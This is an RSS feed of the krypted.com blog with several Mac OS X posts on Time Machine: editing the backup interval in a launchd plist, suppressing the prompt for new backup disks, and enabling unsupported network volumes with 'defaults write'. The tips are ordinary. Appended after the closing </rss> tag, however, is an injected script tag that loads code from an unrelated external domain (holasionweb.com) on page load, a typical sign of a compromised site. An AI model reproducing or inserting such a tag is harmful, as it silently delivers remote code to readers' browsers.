<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; Time Machine</title>
	<atom:link href="http://krypted.com/tag/time-machine/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Changing Time Machine Backup Frequency</title>
		<link>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/</link>
		<comments>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 04:01:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[alter]]></category>
		<category><![CDATA[Backup Frequency]]></category>
		<category><![CDATA[com.apple.backupd-auto.plist]]></category>
		<category><![CDATA[Time Machine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4048</guid>
		<description><![CDATA[Time Machine just does what it does and there&#8217;s not much controlin&#8217; it aside from what&#8217;s in the System Preference pane. Â Or is there? Â Earlier, I covered how to disable the disk check feature, now let&#8217;s look at how to change the frequency of when backups occur. Â Backups are initiated by com.apple.backupd-auto.plist, stored inÂ /System/Library/LaunchDaemons. Â The [...]]]></description>
			<content:encoded><![CDATA[<p>Time Machine just does what it does and there&#8217;s not much controlin&#8217; it aside from what&#8217;s in the System Preference pane. Â Or is there? Â Earlier, I covered how to disable the disk check feature, now let&#8217;s look at how to change the frequency of when backups occur. Â Backups are initiated by com.apple.backupd-auto.plist, stored inÂ /System/Library/LaunchDaemons. Â The contents of this file are, by default:</p>
<blockquote><p>&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;<br />
&lt;!DOCTYPE plist PUBLIC &#8220;-//Apple Computer//DTD PLIST 1.0//EN&#8221; &#8220;http://www.apple.com/DTDs/PropertyList-1.0.dtd&#8221;&gt;<br />
&lt;plist version=&#8221;1.0&#8243;&gt;<br />
&lt;dict&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;Label&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;string&gt;com.apple.backupd-auto&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;ProgramArguments&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;array&gt;<span style="white-space: pre;"> </span>&lt;string&gt;/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;string&gt;-auto&lt;/string&gt;<br />
<span style="white-space: pre;"> </span>&lt;/array&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;StartInterval&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;integer&gt;3600&lt;/integer&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;RunAtLoad&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;false/&gt;<br />
<span style="white-space: pre;"> </span>&lt;key&gt;KeepAlive&lt;/key&gt;<br />
<span style="white-space: pre;"> </span>&lt;false/&gt;<br />
&lt;/dict&gt;<br />
&lt;/plist&gt;</p></blockquote>
<p>The StartInterval integer controls the frequency with which backups occur, in seconds. Â You can customize this by altering the data in the line below (the integer). Â For example, if you set it to 360 then backups will occur every 6 minutes instead of 60, or more likely, if you set the integer to 14400 then your backups will occur every 4 hours instead of every hour.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">/System/Library/LaunchDaemons/com.apple.backupd-attach.plist</div>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/" rel="bookmark" title="June 29, 2009">Suppressing Time Machine on Disk Mount</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-server-105-using-natd-to-turn-the-server-into-a-router/" rel="bookmark" title="August 12, 2008">Mac OS X Server 10.5: Using NATd to turn the Server into a Router</a></li>
<li><a href="http://krypted.com/mac-os-x/creating-a-launchagent/" rel="bookmark" title="May 17, 2007">Creating a LaunchAgent</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-solidifying-the-top-menu-bar/" rel="bookmark" title="November 13, 2007">Mac OS X 10.5: Solidifying the Top Menu Bar</a></li>
<li><a href="http://krypted.com/mac-os-x/disable-disk-arbitration/" rel="bookmark" title="June 28, 2009">Disable Disk Arbitration</a></li>
</ul>
<p><!-- Similar Posts took 8.046 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Suppressing Time Machine on Disk Mount</title>
		<link>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/</link>
		<comments>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 17:00:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[annoying]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[defaults]]></category>
		<category><![CDATA[disk mount]]></category>
		<category><![CDATA[every time]]></category>
		<category><![CDATA[stop]]></category>
		<category><![CDATA[suppress]]></category>
		<category><![CDATA[Time Machine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4046</guid>
		<description><![CDATA[By default, when you are using Time Machine in Mac OS X, every time you insert a drive the system will ask you if you would like to use that drive as a Time Machine backup destination. Â If you are like me and you swap drives around a lot then this can get annoying. Â So [...]]]></description>
			<content:encoded><![CDATA[<p>By default, when you are using Time Machine in Mac OS X, every time you insert a drive the system will ask you if you would like to use that drive as a Time Machine backup destination. Â If you are like me and you swap drives around a lot then this can get annoying. Â So to stop it you can actually just disable a launchd System Daemon, com.apple.backupd-attach. Â To do so, simply move theÂ /System/Library/LaunchDaemons/com.apple.backupd-attach.plist to another location and viola, on the next restart when you attach a disk Time Machine won&#8217;t ask you if you wish to add the disk to your Time Machine destinations.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">/System/Library/LaunchDaemons/com.apple.backupd-attach.plist</div>
<p>While this is one way, reader @Chealion pointed out on Twitter that the following command will go ahead and do the same thing without monkeying with launchd:</p>
<blockquote><p>defaults write /Library/Preferences/com.apple.TimeMachine DoNotOfferNewDisksForBackup -bool true;</p></blockquote>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/" rel="bookmark" title="June 30, 2009">Changing Time Machine Backup Frequency</a></li>
<li><a href="http://krypted.com/mac-os-x/programatic-screen-sharing/" rel="bookmark" title="January 26, 2010">Programatic Screen Sharing</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-using-unsupported-disks-with-time-machine/" rel="bookmark" title="November 7, 2007">Mac OS X 10.5: Using Unsupported Disks with Time Machine</a></li>
<li><a href="http://krypted.com/mac-os-x/making-every-user-an-admin/" rel="bookmark" title="July 27, 2010">Making Every User an Admin</a></li>
<li><a href="http://krypted.com/mac-os-x/bru-primer-advanced/" rel="bookmark" title="June 9, 2010">BRU Primer -> Advanced</a></li>
</ul>
<p><!-- Similar Posts took 6.453 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TimeMachine Over Xsan and iSCSI</title>
		<link>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/</link>
		<comments>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/#comments</comments>
		<pubDate>Sun, 21 Dec 2008 20:36:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[iscsi]]></category>
		<category><![CDATA[Time Machine]]></category>
		<category><![CDATA[TimeMachine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=2960</guid>
		<description><![CDATA[Now that I&#8217;ve shown over the years how to setup an Xsan and iSCSI targets on Mac OS X I am starting to get a number of questions about how to set these up in such a way that Time Machine can backup to them. Â Since they&#8217;re not your typical disks in a lot of [...]]]></description>
			<content:encoded><![CDATA[<p>Now that I&#8217;ve shown over the years how to setup an Xsan and iSCSI targets on Mac OS X I am starting to get a number of questions about how to set these up in such a way that Time Machine can backup to them. Â Since they&#8217;re not your typical disks in a lot of cases there&#8217;s a small command that you&#8217;ll need to run to make it work:</p>
<p>defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1</p>
<p>Essentially, once you&#8217;ve run this command you&#8217;ll be able to back up to anything that appears in /Volumes and then some (for example share points on your local network might appear even if you haven&#8217;t yet authenticated to them). Â You&#8217;ll also be able to backup to disks that are direct attached to an AirPort Extreme (which essentially makes them NAS volumes over an up-to-802.11n medium).<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/xsan/xsan-multiple-volumes/" rel="bookmark" title="February 2, 2006">Xsan: Multiple Volumes</a></li>
<li><a href="http://krypted.com/xsan/disable-spotlight-for-xsan-volumes/" rel="bookmark" title="February 7, 2010">Disable Spotlight for Xsan Volumes</a></li>
<li><a href="http://krypted.com/xsan/the-anatomy-of-a-raid/" rel="bookmark" title="February 7, 2005">The Anatomy of a RAID</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-disable-acls-on-external-volumes-for-leopard/" rel="bookmark" title="October 6, 2008">Mac OS X: Disable ACLs on External Volumes for Leopard</a></li>
<li><a href="http://krypted.com/mac-os-x/no-more-ds_store-files/" rel="bookmark" title="May 24, 2009">Disable and Remove .DS_Store Files</a></li>
</ul>
<p><!-- Similar Posts took 8.733 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mac OS X 10.5: Using Unsupported Disks with Time Machine</title>
		<link>http://krypted.com/mac-os-x/mac-os-x-105-using-unsupported-disks-with-time-machine/</link>
		<comments>http://krypted.com/mac-os-x/mac-os-x-105-using-unsupported-disks-with-time-machine/#comments</comments>
		<pubDate>Wed, 07 Nov 2007 16:18:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Time Machine]]></category>
		<category><![CDATA[com.apple.systempreferences]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=149</guid>
		<description><![CDATA[I originally posted this at http://www.318.com/TechJournal
If you want to use an unsupported disk type for your Time Machine archives, running the following command on workstations will allow you to do so:
defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1Similar Articles:

TimeMachine Over Xsan and iSCSI
Mac OS X 10.5: Disable Glass Shelf in Dock
Suppressing Time Machine on Disk Mount
Mac OS X: [...]]]></description>
			<content:encoded><![CDATA[<p>I originally posted this at http://www.318.com/TechJournal</p>
<p>If you want to use an unsupported disk type for your Time Machine archives, running the following command on workstations will allow you to do so:<br />
<code>defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1</code><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/" rel="bookmark" title="December 21, 2008">TimeMachine Over Xsan and iSCSI</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-disable-glass-shelf-in-dock/" rel="bookmark" title="November 23, 2007">Mac OS X 10.5: Disable Glass Shelf in Dock</a></li>
<li><a href="http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/" rel="bookmark" title="June 29, 2009">Suppressing Time Machine on Disk Mount</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-showing-invisible-files/" rel="bookmark" title="June 20, 2007">Mac OS X: Showing Invisible Files</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-solidifying-the-top-menu-bar/" rel="bookmark" title="November 13, 2007">Mac OS X 10.5: Solidifying the Top Menu Bar</a></li>
</ul>
<p><!-- Similar Posts took 10.463 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/mac-os-x-105-using-unsupported-disks-with-time-machine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>